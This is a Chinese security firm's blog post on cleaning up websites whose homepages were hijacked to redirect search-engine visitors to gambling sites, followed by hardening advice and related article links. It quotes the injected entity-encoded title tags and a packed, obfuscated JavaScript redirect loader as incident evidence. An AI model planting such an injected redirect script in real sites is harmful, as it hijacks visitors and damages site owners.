如何解决网站被篡改提示该站点可能受到黑客攻击,部分页面已被非法篡改!

简介: 最近一段时间,我们SINE安全公司一连接到数十个公司网站被跳转到彩票,博彩网站上去,客户反映从百度搜索网站进去,直接跳转到彩票网站上,直接输入网址没有跳转,导致客户网站的流量急剧下滑,做的百度推广跟搜狗推广,都给彩票网站做广告了,公司领导高度重视网站安全的问题,因为给公司的形象以及名誉带来的损失太大了,我们安排安全技术人员对其网站进行全面的网站安全检测,对网站存在的漏洞,以及木马后门进行全面的清除与漏洞修复,安全加固。

最近一段时间,我们SINE安全公司一连接到数十个公司网站被跳转到彩票,博彩网站上去,客户反映从百度搜索网站进去,直接跳转到彩票网站上,直接输入网址没有跳转,导致客户网站的流量急剧下滑,做的百度推广跟搜狗推广,都给彩票网站做广告了,公司领导高度重视网站安全的问题,因为给公司的形象以及名誉带来的损失太大了,我们安排安全技术人员对其网站进行全面的网站安全检测,对网站存在的漏洞,以及木马后门进行全面的清除与漏洞修复,安全加固。关于网站被跳转到彩票、博彩网站的问题,整理一份详细的处理过程,希望帮到更多遇到这种情况的站长,以及公司网站运营者。

网站被跳转彩票网站问题分析

我们SINE安全跟公司网站负责人进行了详细的服务器信息(服务器IP 远程端口 管理员账号密码、SSH端口、root账号密码),网站信息包括FTP账号密码的对接,由安全部署部门技术对网站的代码以及服务器系统进行缜密的安全检测与分析。

在整体的安全检测当中我们发现客户的网站都存在网站木马后门,包括php脚本木马,asp脚本木马,jsp脚本木马,我们通常叫大马,可以对网站进行恶意篡改,上传,改名,下载,等管理员的高权限操作。出现网站被跳转的客户,采用的网站架构都是php+mysql架构,以及jsp+mysql架构,大多数用的是开源程序,像dedecms,织梦系统,phpcms系统,discuz系统。

由于之前客户网站总是被跳转到彩票、赌博网站,客户只是懂一些简单的代码,只能通过篡改的首页代码里,找到恶意代码进行删除,但是治标不治本,没过几天网站又被跳转了,客户经常为这些问题烦恼,每天提心吊胆的。其实问题的根本原因在于网站存在漏洞,以及服务器安全没有做好。我们SINE处理了成千上百的网站,总结的经验来看,网站首页被篡改的几率最大,都是篡改首页的标题,描述,以及在首页顶部添加一些加密的字符,如下图所示:

<title>&#21271;&#20140;&#36187;&#36710;&#25237;&#27880;&#24179;&#21488;&#95;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#32593;&#19978;&#24320;&#25143;&#95;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#30331;&#24405;&#24179;&#21488;</title><meta name="keywords" content="&#21271;&#20140;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24320;&#22870;&#32467;&#26524;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#24320;&#22870;&#30452;&#25773;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#21382;&#21490;&#35760;&#24405;&#44;&#21271;&#20140;&#36187;&#36710;&#112;&#107;&#49;&#48;&#25237;&#27880;&#32593;&#31449;&#44;&#112;&#107;&#49;&#48;&#32593;&#19978;&#24320;&#25143;&#44;&#112;&#107;&#49;&#48;&#32593;&#19978;&#25237;&#27880;" />

以上代码就是被攻击者添加的加密的标题与描述,解密后发现内容是什么北京赛车,时时彩,PK10等赌博内容。还有一个被攻击的特征就是在首页你会发现一段跳转的代码,该代码是根据搜索引擎的特征来进行判断跳转,比如判断客户的访问来路是通过百度搜索,360搜索,搜狗搜索来的会直接跳转到彩票,赌博网站上去。如下代码:

type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))

跳转到的彩票网站如下截图:

再一个攻击特征就是网站在百度里搜索,出现红色风险标识, 百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 红色提示该百度风险。导致客户打开网站直接被百度拦截,如下图所示:

百度网址安全中心提醒您:

该站点可能受到黑客攻击,部分页面已被非法篡改! 查看详情

您正在访问:http*******com/

该站点可能由于受到黑客攻击,部分页面已被非法篡改,可能会威胁到您的财产和信息安全,建议您谨慎访问。

站点(******.com/)发现的非法篡改页面,可参考以下示例:

被黑网址快照1:********com/011E...

被黑网址快照2:********com/010S...

被黑网址快照3:********com/004G...

针对以上网站被跳转攻击的特征,我们SINE对其进行全面的人工代码安全审计,以及网站漏洞检测,网站木马后门清理,发现dedecms网站存在sql注入漏洞,以及xss获取管理员账号cookies漏洞,discuz存在getshell漏洞,注入获取管理员漏洞,discuz上传绕过漏洞,针对上述漏洞我们进行了全面的修复,并做了网站安全部署,以及服务器安全部署,网站文件防篡改部署。

防止网站被跳转的解决方法如下:

1.对服务器目录权限的安全部署,对管理员账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。

2.mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

3.对服务器底层系统进行安全加固,包括远程端口登录的安全验证。

4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。

5.也可以通过安全公司来解决,国内也就Sinesafe和绿盟等安全公司。

专注于安全领域 解决网站安全 解决网站被黑 网站被挂马 网站被篡改 网站安全、服务器安全提供商-www.sinesafe.com --专门解决其他人解决不了的网站安全问题.
相关文章
|
缓存 安全 搜索推荐
蓝科lankecms漏洞导致被黑客攻击篡改首页文件
近期受到很多用蓝科lankecms网站源码做的网站的客户反馈首页文件index.html和m.html被篡改增加了跳转代码,导致从百度点击进来的直接跳转到世界杯体育网站上去,而且百度快照收录的标题也被篡改了,通过客户的叙述,发现此源码是用tp架构二次开发的,其中源码文件LoginAction.class.php和TextAction.class.php被作者加密了,具体内容无法解密,用的是混淆加密,被篡改的客户基本都是在同一时间批量被篡改,跳转的网址也是一致的,了解情况后我们SINE安全立即安全技术对客户网站进行排查和溯源。
310 0
|
监控 安全 搜索推荐
网站后台数据被入侵篡改了如何解决
网站后台被黑客攻击了怎么办,最近接到一个客户的诉求反映说网站被攻击了后台数据总是被篡改和泄露,而且维持这个状况已经很长时间了,了解完才发现原来早期用的是thinkphp系统源码来搭建的网站,代码版本可以来说是非常古董的,而且后台漏洞非常的多,后面找了一个技术来解决这个问题,但是这个过程他又花了不少时间和钱,漏洞修完过段时间又被反反复复的篡改会员数据,于是他们干脆就改成了完全静态的网站,这个方法只能是治标不治本。
445 0
网站后台数据被入侵篡改了如何解决
|
安全 数据安全/隐私保护
网站被入侵代码被篡改怎么办
网站被篡改到底有多严重,我们公司网站前段时间被人入侵,并且篡改了我们的代码,导致我们网站所有的页面都变成BC广告,导致现在页面持是不收录,每天编辑都在更新文章,结果还是停歇到前段时间被黑的那种页面,如果我们的网站迟迟没发现被篡改的话,甚至不会处理或者再次被反复篡改的话,那么就有可能导致蜘蛛再来抓取我们的网站页面的时候,还是这种非正规行业,从而多次出现这种情况,就会给我们网站进行进行降权,并且k站,我们该如何防御这种被篡改的方式的能够入侵到我们网站,获取到了我们的权限,才会出现这种情况。
316 0
网站被入侵代码被篡改怎么办
|
SQL 安全 前端开发
网站会员信息被黑客入侵攻击修改了数据怎么解决
2020春节即将来临,收到新聚合支付平台网站客户的求助电话给我们Sinesafe,反映支付订单状态被修改由原先未支付修改为已支付,导致商户那边直接发货给此订单会员了,商户和平台的损失较大,很多码商都不敢用此支付平台了,为了防止聚合支付系统继续被攻击,我们SINE安全大体情况了解后,立即安排从业十年的安全工程师,成立聚合、通道支付平台安全应急响应小组。
234 0
网站会员信息被黑客入侵攻击修改了数据怎么解决
|
安全 搜索推荐 JavaScript
如何解决网站首页老是被篡改经常反复被篡改
网站首页被篡改说明你网站程序有漏洞导致被上传了脚本后门木马 从而进行篡改内容被百度收录一些BC内容和垃圾与网站不相关的内容,建议找专业做安全的来进行网站安全服务漏洞检测与修补以及代码安全审计,清理网站后门和恶意代码,而且这个快照内容被劫持 会在搜索引擎中点开后网站会被跳转,对网站的影响非常大
516 0
如何解决网站首页老是被篡改经常反复被篡改
|
SQL 安全 Linux
支付平台目前订单状态被篡改 刷钱 劫持漏洞的修复办法
临近春节,某聚合支付平台被攻击篡改,导致客户提现银行卡信息被修改,支付订单被恶意回调,回调API接口的数据也被篡改,用户管理后台被任意登入,商户以及码商的订单被自动确认导致金额损失超过几十万,平台被攻击的彻底没办法了,通过朋友介绍,找到我们SINE安全公司寻求网站安全防护支持,针对客户支付通道并聚合支付网站目前发生被网站攻击,被篡改的问题,我们立即成立了网站安全应急响应小组,分析问题,找到漏洞根源,防止攻击篡改,将客户的损失降到最低。
526 0
支付平台目前订单状态被篡改 刷钱 劫持漏洞的修复办法
|
安全 前端开发 程序员
Discuz被攻击 首页篡改的漏洞修复解决办法
Discuz 3.4是目前discuz论坛的最新版本,也是继X3.2、X3.3来,最稳定的社区论坛系统。目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全检测的时候,发现网站漏洞,该漏洞是由于用户登录论坛的时候调用的微信接口,导致可以进行任意登录,甚至可以登录到管理员的账号里去。
458 0
Discuz被攻击 首页篡改的漏洞修复解决办法
|
SQL 监控 安全
网站服务器被攻击了如何查找木马(webshell)IP 篡改的痕迹
很对客户网站以及服务器被攻击,被黑后,留下了很多webshell文件,也叫网站木马文件,客户对自己网站的安全也是很担忧,担心网站后期会继续被攻击篡改,毕竟没有专业的安全技术去负责网站的安全防护工作,通过老客户的介绍很多客户在遇到网站被攻击后找到我们SINE安全做网站的安全服务,防止恶意攻击与篡改。对网站进行全面的防御与加固,我们在对客户网站进行安全部署的同时,客户经常会想要了解到底网站,以及服务器是如何被入侵,攻击者的IP是谁,那么我们SINESAFE技术针对这种情况,最好的办法就是通过日志进行分析,溯源追踪,帮助客户找到网站漏洞根源,到底是谁在攻击他们。下面我们来分享一下,我们是如何对日志进
591 0
网站服务器被攻击了如何查找木马(webshell)IP 篡改的痕迹
|
SQL 安全 搜索推荐
如何处理网站被植入恶意的一些代码导致的被机房拦截提示
如何处理网站被植入恶意的一些代码导致的被机房拦截提示
254 0
如何处理网站被植入恶意的一些代码导致的被机房拦截提示
|
SQL 缓存 安全
WordPress 站点地址被恶意篡改的防护方案讨论
关键词:WordPress,篡改,挂马,恶意,攻击,注入,跳转,重定向,网址,siteurl,home,url,hacked,jump,redirect 摘要:WordPress 站点稍有不慎就有可能受到恶意攻击。一种常见的手段是通过篡改站点的地址,用户访问网站时将会被重新定向到恶意网站。长老将分析两种常见的攻击手段:修改文件和修改数据库,并分享一些安全防护的小技巧。
581 0